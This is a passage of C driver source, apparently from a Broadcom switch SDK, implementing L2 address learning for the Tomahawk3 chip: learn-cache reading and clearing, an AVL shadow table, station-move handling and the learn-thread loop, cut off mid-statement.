soc_th3_l2_age_stop(int unit) { soc_control_t *soc = SOC_CONTROL(unit); int rv = SOC_E_NONE; soc_timeout_t to; SOC_CONTROL_LOCK(unit); soc->l2x_age_interval = 0; /* Request exit */ SOC_CONTROL_UNLOCK(unit); if (soc->l2x_age_pid && (soc->l2x_age_pid != SAL_THREAD_ERROR)) { /* Wake up thread so it will check the exit flag */ sal_sem_give(soc->l2x_age_notify); /* Give thread a few seconds to wake up and exit */ if (SAL_BOOT_SIMULATION) { soc_timeout_init(&to, 300 * 1000000, 0); } else { soc_timeout_init(&to, 60 * 1000000, 0); } while (soc->l2x_age_pid != SAL_THREAD_ERROR) { if (soc_timeout_check(&to)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "thread will not exit\n"))); rv = SOC_E_INTERNAL; break; } } } return rv; } /* * Function: * soc_th3_l2_lrn_cache_entry_invalidate * Purpose: * This function clears a specific L2 learn cache entry from a given pipe. * It will be called during learning process to clear entries after they are * learned * Parameters: * unit - unit number * pipe - pipe number (0 based) * entry - entry index with learn cache (0 based) * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_lrn_cache_entry_invalidate(int unit, int pipe, int entry) { soc_mem_t mem; if ((pipe < 0) || (pipe > (NUM_PIPE(unit) - 1))) { return SOC_E_PARAM; } mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; if ((entry < soc_mem_index_min(unit, mem)) || (entry > soc_mem_index_max(unit, mem))) { return SOC_E_PARAM; } soc_mem_lock(unit, mem); SOC_IF_ERROR_RETURN(soc_mem_write(unit, mem, MEM_BLOCK_ALL, entry, soc_mem_entry_zeroes(unit, mem))); soc_mem_unlock(unit, mem); return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_clear * Purpose: * This function clears L2 learn cache. All copies of learn cache (in all * pipes) are cleared * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_learn_cache_clear(int unit) { int pipe; soc_info_t *si; soc_mem_t mem; si = &SOC_INFO(unit); for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { if (SOC_PBMP_IS_NULL(si->pipe_pbm[pipe])) { continue; } mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; soc_mem_lock(unit, mem); SOC_IF_ERROR_RETURN(soc_mem_clear(unit, mem, MEM_BLOCK_ALL, TRUE)); soc_mem_unlock(unit, mem); } return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_status_clear * Purpose: * This function clears L2 learn cache status registers. All copies of learn * cache (in all pipes) are cleared. These are sticky bits and need to be * explicitly cleared by software during init or shutdown of L2 module * Parameters: * unit - unit number * Returns: * SOC_E_XXX */ STATIC int soc_th3_l2_learn_cache_status_clear(int unit) { int pipe; soc_reg_t reg = INVALIDr; uint32 rval = 0; reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[0]; SOC_IF_ERROR_RETURN(soc_reg32_get(unit, reg, REG_PORT_ANY, 0, &rval)); soc_reg_field_set(unit, reg, &rval, L2_LEARN_CACHE_FULLf, 0x0); soc_reg_field_set(unit, reg, &rval, L2_LEARN_CACHE_THRESHOLD_EXCEEDEDf, 0x0); for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[pipe]; SOC_IF_ERROR_RETURN(soc_reg32_set(unit, reg, REG_PORT_ANY, 0, rval)); } return SOC_E_NONE; } /* * Function: * _soc_th3_l2_learn_cache_status_check_clear * Purpose: * This function checks status of one or more status bits in a pipe's * L2 learn cache status register for the specified pipe. If any bit is set, * it clears the bit(s). These are sticky bits and need to be explicitly * cleared by software * Parameters: * unit - Unit number * pipe - Pipe whose status bit needs to be cleared * fld_ptr - Pointer to an array of one or more fields which are to be cleared * num_flds - Size of fld_ptr array * Returns: * SOC_E_XXX * Notes: * Caller must provide correct pipe number and correct field value(s) */ STATIC int _soc_th3_l2_learn_cache_status_check_clear(int unit, int pipe, soc_field_t *fld_ptr, int num_flds) { soc_reg_t reg = INVALIDr; uint32 rval = 0; uint32 bit_val; int i; int clear; reg = SOC_REG_UNIQUE_ACC(unit, L2_LEARN_CACHE_STATUSr)[pipe]; SOC_IF_ERROR_RETURN(soc_reg32_get(unit, reg, REG_PORT_ANY, 0, &rval)); clear = FALSE; for (i = 0; i < num_flds; i++) { /* Check if a status bit is set. If so clear it, else check next bit */ bit_val = soc_reg_field_get(unit, reg, rval, fld_ptr[i]); if (bit_val) { soc_reg_field_set(unit, reg, &rval, fld_ptr[i], 0x0); clear = TRUE; } } /* Program register only if atleast one bit was modified */ if (clear == TRUE) { SOC_IF_ERROR_RETURN(soc_reg32_set(unit, reg, REG_PORT_ANY, 0, rval)); } return SOC_E_NONE; } /* * Function: * soc_th3_l2_learn_cache_read * Purpose: * This function reads all L2 learn cache entries for a given pipe * Parameters: * unit - unit number * pipe - pipe to read from (range: 0-7) * buffer - Buffer filled by memory read operation * Returns: * SOC_E_XXX * Notes: * Caller must do range check and provide correct pipe number */ STATIC int soc_th3_l2_learn_cache_read(int unit, int pipe, uint32 *buffer) { soc_mem_t mem; uint32 index_min, index_max; int rv; rv = SOC_E_NONE; mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; index_min = soc_mem_index_min(unit, mem); index_max = soc_mem_index_max(unit, mem); soc_mem_lock(unit, mem); /* Read learn cache entries from the specified pipe */ rv = soc_mem_read_range(unit, mem, MEM_BLOCK_ANY, index_min, index_max, buffer); /* Explicitly clear learn cache for rev A0 */ if (SOC_CONTROL(unit)->lrn_cache_clr_on_rd && (rev_id == BCM56980_A0_REV_ID)) { if (rv == SOC_E_NONE) { rv = soc_mem_clear(unit, mem, MEM_BLOCK_ALL, FALSE); } } soc_mem_unlock(unit, mem); if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s:DMA read failed: %s\n"), __FUNCTION__, soc_errmsg(rv))); } return rv; } /* * Function: * _soc_th3_learn_avl_compare_key * Purpose: * Comparison function for AVL shadow table operations * Parameters: * user_data - User supplied data reuired by AVL library * datum1 - First data item to compare * datum2 - Second data item to compare * Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_avl_compare_key(void *user_data, shr_avl_datum_t *datum1, shr_avl_datum_t *datum2) { soc_l2_lrn_avl_info_p k1, k2; /* COMPILER_REFERENCE(user_data);*/ k1 = (soc_l2_lrn_avl_info_p)datum1; k2 = (soc_l2_lrn_avl_info_p)datum2; SOC_MEM_COMPARE_RETURN(k1->vlan, k2->vlan); return ENET_CMP_MACADDR(k1->mac, k2->mac); } /* * Function: * soc_th3_lrn_shadow_insert * Purpose: * This function is used to insert an entry in to learn shadow table, * corresponding to the hardware L2 entry added before calling this function. * Since there is no relevance of L2 multicast, static entries and * vlan cross connect entries for learning process we ignore these entry types. * See Notes * Parameters: * unit - Switch unit # * l2x_entry_t - Entry to be inserted in to AVL tree * Returns: * SOC_E_XXX * Notes: * Caller _must_ lock mutex l2x_lrn_shadow_mutex before calling this function */ int soc_th3_lrn_shadow_insert(int unit, l2x_entry_t *entry) { soc_l2_lrn_avl_info_t k; int rv; /* If shadow memory is freed, or not set up, do nothing */ if (SOC_CONTROL(unit)->l2x_lrn_shadow == NULL) { return SOC_E_NONE; } /* If entry is not valid, do not insert in to shadow table */ if (!soc_mem_field32_get(unit, L2Xm, entry, BASE_VALIDf)) { return SOC_E_NONE; } /* Ignore static entry */ if (soc_L2Xm_field32_get(unit, entry, STATIC_BITf)) { return SOC_E_NONE; } /* Do not add single cross connect entries, since they are niether learned, * nor aged */ if (soc_mem_field32_get(unit, L2Xm, entry, KEY_TYPEf) != TH3_L2_HASH_KEY_TYPE_BRIDGE) { return SOC_E_NONE; } sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, L2Xm, entry, MAC_ADDRf, k.mac); /* Do not add multicast entries */ if (SOC_TH3_MAC_IS_MCAST(k.mac)) { return SOC_E_NONE; } k.vlan = soc_mem_field32_get(unit, L2Xm, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, L2Xm, entry, Tf); k.port_tgid = soc_mem_field32_get(unit, L2Xm, entry, DESTINATIONf); /* Entry has already been added to h/w, so we set in_hw to 'true' */ k.in_hw = TRUE; rv = shr_avl_insert(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)&k); /* We do not return error since normally there will always be space for a * new entry to add in the tree. If this were not the case, mem insert/write * called before invoking this function will fail. Also, the full condition * may be cleared by software replace mechanism, or aging, or application * deleting L2 entries. Also hardware h/w has already been updated at this * point */ if (rv == -1) { LOG_WARN(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "shr_avl_insert - tree full\n"))); } return SOC_E_NONE; } /* * Function: * soc_th3_lrn_shadow_delete * Purpose: * This function deletes an entry from learn shadow table, * after the hardware L2 entry is deleted. Since there is no relevance of L2 * multicast, static entries and vlan cross connect entries for learning * process we ignore these entry types. See Notes * Parameters: * unit - Switch unit # * l2x_entry_t - Entry to be inserted in to AVL tree * Returns: * SOC_E_XXX * Notes: * Caller _must_ lock mutex l2x_lrn_shadow_mutex before calling this function */ int soc_th3_lrn_shadow_delete(int unit, l2x_entry_t *entry) { soc_l2_lrn_avl_info_t k; int rv; /* If shadow memory is freed, or not set up, don't do anything */ if (SOC_CONTROL(unit)->l2x_lrn_shadow == NULL) { return SOC_E_NONE; } #if 0 /* If entry is not valid, do not insert in to shadow table */ if (!soc_mem_field32_get(unit, L2Xm, entry, BASE_VALIDf)) { return SOC_E_NONE; } #endif /* Ignore static entry */ if (soc_L2Xm_field32_get(unit, entry, STATIC_BITf)) { return SOC_E_NONE; } /* Ignore single cross connect entries, since they are niether learned, * nor aged */ if (soc_mem_field32_get(unit, L2Xm, entry, KEY_TYPEf) != TH3_L2_HASH_KEY_TYPE_BRIDGE) { return SOC_E_NONE; } sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, L2Xm, entry, MAC_ADDRf, k.mac); /* Ignore multicast entries */ if (SOC_TH3_MAC_IS_MCAST(k.mac)) { return SOC_E_NONE; } k.vlan = soc_mem_field32_get(unit, L2Xm, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, L2Xm, entry, Tf); k.port_tgid = soc_mem_field32_get(unit, L2Xm, entry, DESTINATIONf); /* Entry has already been deleted from h/w, so we set in_hw to 'false' */ k.in_hw = FALSE; rv = shr_avl_delete(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)&k); if (rv == 0) { LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "shr_avl_delete: Did not find datum\n"))); } return SOC_E_NONE; } /* * Function: * soc_th3_lrn_shadow_show * Purpose: * Debug display function for AVL learn shadow table * Parameters: * user_data - Used to pass StrataSwitch unit # * datum - AVL node to display * extra_data - Unused * Returns: * SOC_E_XXX */ int soc_th3_lrn_shadow_show(void *user_data, shr_avl_datum_t *datum, void *extra_data) { int unit = PTR_TO_INT(user_data); soc_l2_lrn_avl_info_p k = (soc_l2_lrn_avl_info_p)datum; COMPILER_REFERENCE(extra_data); BSL_LOG(BSL_LSS_CLI, (BSL_META_U(unit, "dest_type: %d, port_tgid: %d, mod: %d, in_hw: %d \n"),k->dest_type, k->port_tgid, k->mod, k->in_hw)); BSL_LOG(BSL_LSS_CLI, (BSL_META_U(unit, "mac(in hex) %02X:%02X:%02X:%02X:%02X:%02X, vlan: %d\n"),k->mac[0], k->mac[1], k->mac[2], k->mac[3], k->mac[4], k->mac[5], k->vlan)); LOG_CLI((BSL_META_U(unit, "----------------------------------------\n"))); return SOC_E_NONE; } /* * Function: * _soc_th3_learn_do_lookup * Purpose: * This function searches shadow table for matching key, and sets passed * arguments accordingly * Parameters: * unit(IN) - Device unit number * k(IN/OUT) - key items to search for. The AVL library updates other * fields of this structure, if key is found * found(OUT) - Set to true if item is found, else set to false * stn_move(OUT) - Set to true if station move condition is detected, * else set to false * Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_do_lookup(int unit, soc_l2_lrn_avl_info_p k, int *found, int *stn_move) { int result; int port_tgid; int dest_type; /* Save port number obtained from hardware * Note AVL lookup overwrites 'k' completely, if the entry was found */ port_tgid = k->port_tgid; dest_type = k->dest_type; sal_mutex_take(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex, sal_mutex_FOREVER); result = shr_avl_lookup(SOC_CONTROL(unit)->l2x_lrn_shadow, _soc_th3_learn_avl_compare_key, (shr_avl_datum_t *)k); sal_mutex_give(SOC_CONTROL(unit)->l2x_lrn_shadow_mutex); /* Check if a matching node was found in AVL tree. If so, check if the * entry has been added to L2 table in h/w. If so, then do nothing. * If not, the entry needs to be flagged for programming in h/w */ *found = FALSE; *stn_move = FALSE; if (result) { /* Entry found */ *found = TRUE; /* If entry is found, check for station move */ *stn_move = ((k->dest_type == dest_type) && (k->port_tgid == port_tgid)) ? FALSE : TRUE; } return SOC_E_NONE; } /* * Function: * _soc_th3_learn_cache_entry_process * Purpose: * This function processes each entry from the learn cache. It check if the * if the entry is present in learn shadow table. If entry is not found, it is * a new L2 flow, so its added programmed in to main L2 table. Learn cache * is updated after addition. * Parameters: * unit - Unit number of device * pipe - Pipe in which the entry was detected (range: 0-7) * entry - Learn cache entry from the pipe * index - Location of entry within the learn cache (range 0-15) * Returns: * SOC_E_XXX * Notes: * None */ STATIC int _soc_th3_learn_cache_entry_process(int unit, int pipe, l2_learn_cache_entry_t *entry, int entry_idx) { int rv; int found; int stn_move; soc_mem_t mem; soc_l2_lrn_avl_info_t k; int invalidated = FALSE; int curr_l2_table_entries; int max_l2_table_entries; int l2copyno; max_l2_table_entries = soc_mem_index_count(unit, L2Xm); l2copyno = SOC_MEM_BLOCK_ANY(unit, L2Xm); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; sal_memset(&k, 0x0, sizeof(k)); soc_mem_mac_addr_get(unit, mem, entry, MAC_ADDRf, k.mac); k.vlan = soc_mem_field32_get(unit, mem, entry, VLAN_IDf); k.dest_type = soc_mem_field32_get(unit, mem, entry, DEST_TYPEf); k.port_tgid = soc_mem_field32_get(unit, mem, entry, DESTINATIONf); k.in_hw = FALSE; rv = _soc_th3_learn_do_lookup(unit, &k, &found, &stn_move); /* Check if learn interrupt needs to be disabled during processing below */ if (rv == SOC_E_NONE) { l2x_entry_t l2x_entry; soc_port_t port_tgid = 0; soc_field_t field = INVALIDf; if (SOC_CONTROL(unit)->lrn_cache_clr_on_rd) { /* Check if entry was added to h/w by previous learn cache entry */ /* Duplicate entries can result only in clear on read mode */ if (found == TRUE) { if (k.in_hw == TRUE) { /* In case of station move, L2X entry is already present in * h/w (in_hw is true); we should not invalidate the first * learn cache entry here (for station move), without * checking station move condition (station move is handled * later in this function) */ if (stn_move == FALSE) { /* Entry cleared by h/w in clr-on-rd mode, so we do not * explicitly invalidate the entry here */ /* SOC_IF_ERROR_RETURN( soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "Duplicate lrn cache entry:" " pipe %d, index %d\n"), pipe, entry_idx)); return rv; } } else { /* If k.in_hw is FALSE, it means h/w was * updated, but software table entry was not, which should * never happen. It may point to software table corruption, * or a problem arising out of table write sequence. * Tables should always be in sync */ LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%s: S/w" " entry %d, in pipe %d out of sync with" " h/w\n"), __FUNCTION__, entry_idx, pipe)); return SOC_E_INTERNAL; } } } sal_memset(&l2x_entry, 0, sizeof(l2x_entry)); soc_L2Xm_field32_set(unit, &l2x_entry, BASE_VALIDf, 0x1); soc_L2Xm_field32_set(unit, &l2x_entry, VLAN_IDf, k.vlan); soc_L2Xm_mac_addr_set(unit, &l2x_entry, MAC_ADDRf, k.mac); soc_L2Xm_field32_set(unit, &l2x_entry, KEY_TYPEf, TH3_L2_HASH_KEY_TYPE_BRIDGE); if (k.dest_type) { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x1); } if (found == FALSE) { /* Replace original port with new port */ field = k.dest_type ? TGIDf : PORT_NUMf; soc_L2Xm_field32_set(unit, &l2x_entry, field, k.port_tgid); soc_L2Xm_field32_set(unit, &l2x_entry, HITSAf, 1); /* Insert L2 entry in h/w */ soc_mem_lock(unit, L2Xm); curr_l2_table_entries = SOP_MEM_STATE(unit, L2Xm).count[l2copyno]; /* If there is no space in the L2 table, do not issue insert. Note * that current L2 table size is dynamically changing; entries can * be added/deleted though other sources like application thread * (using L2 APIs), cmd shell, other internal SDK modules and so on. * So the current table enttries is only a tentative (but closer to * accurate) value */ rv = SOC_E_NONE; if ((curr_l2_table_entries >= 0) && (curr_l2_table_entries < max_l2_table_entries)) { rv = soc_mem_insert(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); } soc_mem_unlock(unit, L2Xm); /* AVL tree will be updated through soc_th3_l2x_shadow_callback */ if ((rv == SOC_E_FULL) || (rv == SOC_E_EXISTS) || (rv == SOC_E_NOT_FOUND)) { /* If full, exist or not found conditions are encountered, we * simply log an error. If we return error, learn thread will * exit. We don't want the thread to exit based on certain * 'conditions', or search result, since it will stop learning * altogether. Full condition can get cleared later on by aging, * deletions by application(s), or by s/w replace operation. */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_insert retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } else { if (SOC_FAILURE(rv)) { return rv; } } /* Clear entry in learn cache only if clr on rd is not enabled */ if (!(SOC_CONTROL(unit)->lrn_cache_clr_on_rd)) { SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } invalidated = TRUE; } /* Handle station move */ if ((stn_move == TRUE) && (found == TRUE)) { soc_mem_lock(unit, L2Xm); rv = soc_mem_delete(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); if (SOC_FAILURE(rv)) { soc_mem_unlock(unit, L2Xm); if (rv == SOC_E_NOT_FOUND) { /* If entry is not found, log an error. Do not return this * error code since it is not a critical/fatal error. If * same error code is returned, the learn thread will exit * and learning will stop */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_delete" " retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } return rv; } /* Replace original port with new port */ port_tgid = soc_mem_field32_get(unit, mem, entry, DESTINATIONf); /* k.dest_type, k.port_tgid are overwritten by * _soc_th3_learn_do_lookup, so we get k.dest_type from learn cache * again (k.port_tgid is not used here though) */ k.dest_type = soc_mem_field32_get(unit, mem, entry, DEST_TYPEf); field = k.dest_type ? TGIDf : PORT_NUMf; if (k.dest_type) { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x1); } else { soc_L2Xm_field32_set(unit, &l2x_entry, Tf, 0x0); } soc_L2Xm_field32_set(unit, &l2x_entry, field, port_tgid); soc_L2Xm_field32_set(unit, &l2x_entry, HITSAf, 1); rv = soc_mem_insert(unit, L2Xm, MEM_BLOCK_ALL, &l2x_entry); soc_mem_unlock(unit, L2Xm); if ((rv == SOC_E_FULL) || (rv == SOC_E_EXISTS) || (rv == SOC_E_NOT_FOUND)) { /* If full, exist or not found conditions are encountered, we * simply log an error. If we return error, learn thread will * exit. We don't want the thread to exit based on certain * 'conditions', or search result, since it will stop learning * altogether. Full condition can get cleared later on by aging, * deletions by application(s), or by s/w replace operation. */ LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: soc_mem_insert retval %d\n"), __FUNCTION__, rv)); rv = SOC_E_NONE; } else { if (SOC_FAILURE(rv)) { return rv; } } /* AVL tree will be updated through soc_th3_l2x_shadow_callback */ /* Clear entry in learn cache only if clr on rd is not enabled */ if (!(SOC_CONTROL(unit)->lrn_cache_clr_on_rd)) { SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } invalidated = TRUE; } } /* This case should not happen, added here as a precaution to avoid * full condition for learn cache due to unprocessed entries (if * this condition is reached, it means the entry was not processed * earlier) */ if (invalidated == FALSE) { LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: Entry %d in pipe %d not processed," " removing it from lrn cache\n"), __FUNCTION__, entry_idx, pipe)); SOC_IF_ERROR_RETURN(soc_th3_l2_lrn_cache_entry_invalidate(unit, pipe, entry_idx)); } return rv; } /* * Function: * _soc_th3_lrn_cache_intr_configure * Purpose: * This function is used to enable or disable L2 learn cache interrupt * generation * Parameters: * unit - SOC unit # * bit - Bit number corresponding to a pipe. Bit 8 is for pipe 0 and * bit 15 is for pipe 7. See Notes. * enable - To enable interrupt, use 1 or a non-zero value. * To disable interrupt, use 0. * Returns: * SOC_E_XXX * Notes: * This function uses hard-coded values for interrupt numbers/bit positions. * Also it assumes fixed number of bits (1 per pipe), contiguous numbering, * and fixed bit positions for each pipe; so it is not portable */ STATIC int _soc_th3_lrn_cache_intr_configure(int unit, int bit, int enable) { int rv = SOC_E_NONE; uint32 regval = 0; soc_reg_t reg = ICFG_CHIP_LP_INTR_ENABLE_REG1r; /* Accept only bits 8-15 (both numbers included) */ if ((bit < 8) || (bit > 15)) { return SOC_E_INTERNAL; } rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &regval); if (rv == SOC_E_NONE) { if (enable) { regval |= 1 << bit; } else { regval &= ~(1 << bit); } rv = soc_iproc_setreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), regval); } return rv; } /* * Function: * soc_th3_lrn_cache_intr_handler * Purpose: * Interrupt handler for (per-pipe) learn cache (fifo) interrupt * Parameters: * unit - SOC unit # * data - Data used by the isr, initialized during interrupt registration * Returns: * Nothing */ void soc_th3_lrn_cache_intr_handler(int unit, void *data) { soc_control_t *soc = SOC_CONTROL(unit); int i; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Disable learn cache interrupts from all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 0); } /* Signal lrn thread of learn event(s) */ sal_sem_give(soc->arl_notify); } /* If we see interrupt in polled mode, then there is some misconfiguration. * In this case, check L2_LEARN_COPY_CACHE_CTRL's interrupt control bit */ return; } /* * Function: * soc_th3_l2_learn_alloc_resources * Purpose: * This function is used to create learn shadow table memory and mutex for * safe access to the shadow table. It is called during L2 initialization * Parameters: * u - Pointer to unit number * Returns: * SOC_E_NONE on success * Other SOC_E_* codes on error */ int soc_th3_l2_learn_alloc_resources(int unit) { /* Create AVL table and semaphore used for L2 learning */ if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { if (shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow) < 0) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling shr_avl_destroy\n"), unit)); return SOC_E_INTERNAL; } SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } if (shr_avl_create(&SOC_CONTROL(unit)->l2x_lrn_shadow, INT_TO_PTR(unit), sizeof(soc_l2_lrn_avl_info_t), _SOC_TH3_L2_LRN_TBL_SIZE) < 0) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling shr_avl_create\n"), unit)); return SOC_E_MEMORY; } if ((SOC_CONTROL(unit)->l2x_lrn_shadow_mutex = sal_mutex_create("L2AvlMutex")) == NULL) { if (SOC_CONTROL(unit)->l2x_lrn_shadow != NULL) { shr_avl_destroy(SOC_CONTROL(unit)->l2x_lrn_shadow); SOC_CONTROL(unit)->l2x_lrn_shadow = NULL; } LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "%d: Error calling sal_mutex_create for" " L2 AVL Mutex\n"), unit)); return SOC_E_MEMORY; } LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%d: %s: Created" " shadow table and mutex\n"), unit, __FUNCTION__)); return SOC_E_NONE; } /* * Function: * _soc_th3_l2_learn_process * Purpose: * This function is the main handler for learn thread. It will be used by * learn thread during learning. It will read learn cache entries, perform * look-ups in shadow (AVL) table during station move, and write to it * after an L2 entry is learned * Parameters: * u - Pointer to unit number * Returns: * Nothing */ STATIC void _soc_th3_l2_learn_process(void *u) { int unit = PTR_TO_INT(u); soc_control_t *soc = SOC_CONTROL(unit); int interval; void *buffer; uint32 index_min; int count; int num_bytes; int rv; int pipe; soc_mem_t mem; int i; int valid; LOG_INFO(BSL_LS_SOC_L2, (BSL_META_U(unit, "%d: In _soc_th3_l2_learn_process\n"), unit)); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[0]; num_bytes = soc_mem_entry_bytes(unit, mem); count = soc_mem_index_count(unit, mem); index_min = soc_mem_index_min(unit, mem); buffer = soc_cm_salloc(unit, num_bytes * count, "L2_LEARN_CACHEm"); if (buffer == NULL) { soc_event_generate(unit, SOC_SWITCH_EVENT_THREAD_ERROR, SOC_SWITCH_EVENT_THREAD_L2X_LEARN, __LINE__, SOC_E_MEMORY); goto cleanup_exit; } if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* Enable learn cache interrupts for all pipes */ for (i = 8; i <= 15; i++) { (void)_soc_th3_lrn_cache_intr_configure(unit, i, 1); } } while((interval = soc->l2x_learn_interval)) { uint32 sts_reg = 0; uint32 en_reg = 0; uint32 mask = 0; uint32 poll_all_pipes = 1; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { soc_reg_t reg = INVALIDr; uint32 shift = 0; sal_sem_take(soc->arl_notify, interval); /* * We read the interrupt status here, and process the pipes whose * learn cache has reached or exceeded threshold. While processing, * if other pipes raise interrupts, we will process them in the * next cycle */ reg = ICFG_CHIP_LP_INTR_RAW_STATUS_REG1r; rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &sts_reg); if (SOC_SUCCESS(rv)) { reg = ICFG_CHIP_LP_INTR_ENABLE_REG1r; rv = soc_iproc_getreg(unit, soc_reg_addr(unit, reg, REG_PORT_ANY, 0), &en_reg); } if (SOC_FAILURE(rv)) { LOG_ERROR(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Failed to read register" " %s, rv = %d\n"), SOC_REG_NAME(unit, reg), rv)); goto cleanup_exit; } shift = 8; /* L2 learn interrupt bits start at bit 8 */ /* Create mask to pick the set of learning bits */ mask = (1U << NUM_PIPE(unit)) - 1; mask <<= shift; /* Clear out intr bits other than those that are for learning */ en_reg &= mask; sts_reg &= mask; /* Select intr bits which are currently disabled by the isr * (soc_th3_lrn_cache_intr_handler), since those are the ones that * need to be serviced. (Note currently we reset all bits in the * isr to simplify interrupt processing) */ sts_reg &= ~en_reg; sts_reg >>= shift; /* Process all pipes if there was no interrupt during learn * interval. This way we handle pipes which have entries, but the * threshold has not reached, so the interrupt is not generated * (for those pipes) */ poll_all_pipes = !sts_reg ? 1 : 0; } /* The system is in warmboot phase. We do not do any learn processing * until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } for (pipe = 0; pipe < NUM_PIPE(unit); pipe++) { int full_cleared; int thr_cleared; /* Number of valid learn cache entries processed successfully */ int processed_cnt; soc_info_t *si = &SOC_INFO(unit); /* For half-pipe configuration, this check has been added */ if (SOC_PBMP_IS_NULL(si->pipe_pbm[pipe])) { continue; } /* The system is in warmboot phase. We do not do any learn * processing until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } full_cleared = FALSE; thr_cleared = FALSE; /* Count the number of valid entries processed, and use it to * compare to threshold value */ processed_cnt = 0; if (soc->l2x_lrn_mode == L2_LRN_MODE_INTR) { /* sts_reg has bits set for pipes whose caches need * to be processed * If we are not polling all pipes, then we should check * individual bits in the sts_reg bitmap (corresponding to each * pipe), and process entries in that pipe (interrupt was * asserted for pipes in sts_reg bitmap) */ /* If we shouldn't process all pipes, then specific pipes in the * bitmap are the ones which need to be serviced */ if ((!poll_all_pipes) && (!(sts_reg & (1U << pipe)))) { continue; } } /* Read cache entries for the specified pipe */ rv = soc_th3_l2_learn_cache_read(unit, pipe, buffer); if (SOC_FAILURE(rv)) { soc_event_generate(unit, SOC_SWITCH_EVENT_THREAD_ERROR, SOC_SWITCH_EVENT_THREAD_L2X_LEARN, __LINE__, rv); goto cleanup_exit; } /* Process each learn cache entry */ for (i = index_min; i < (index_min + count); i++) { l2_learn_cache_entry_t *entry; if (!soc->l2x_learn_interval) { goto cleanup_exit; } /* The system is in warmboot phase. We do not do any learn * processing until we are out of warmboot */ if (SOC_WARM_BOOT(unit)) { goto skip_processing; } /* Point to the next entry in the buffer */ entry = (l2_learn_cache_entry_t *)((uint8 *)buffer + i * num_bytes); mem = SOC_MEM_UNIQUE_ACC(unit, L2_LEARN_CACHEm)[pipe]; valid = soc_mem_field32_get(unit, mem, entry, VALIDf); /* Process valid entries only */ if (valid) { LOG_DEBUG(BSL_LS_SOC_L2, (BSL_META_U(unit, "%s: Valid entry in pipe %d, index %d\n"), __FUNCTION__, pipe, i)); rv = _soc_th3_learn_cache_entry_process(unit, pipe, entry, i); if (SOC_FAILURE(rv)) { /* In case of failure, we do not exit the thread, since * learning will stop altogether. Assumption is that * the error may be transitory in nature */ LOG_INFO(BSL_LS_SOC_COMMON, (BSL_META_U(unit, "Failed to add entry" " in pipe %d, index %d, rv = %d\n"), pipe, i, rv)); continue; } if (soc->l2x_lrn_mode == 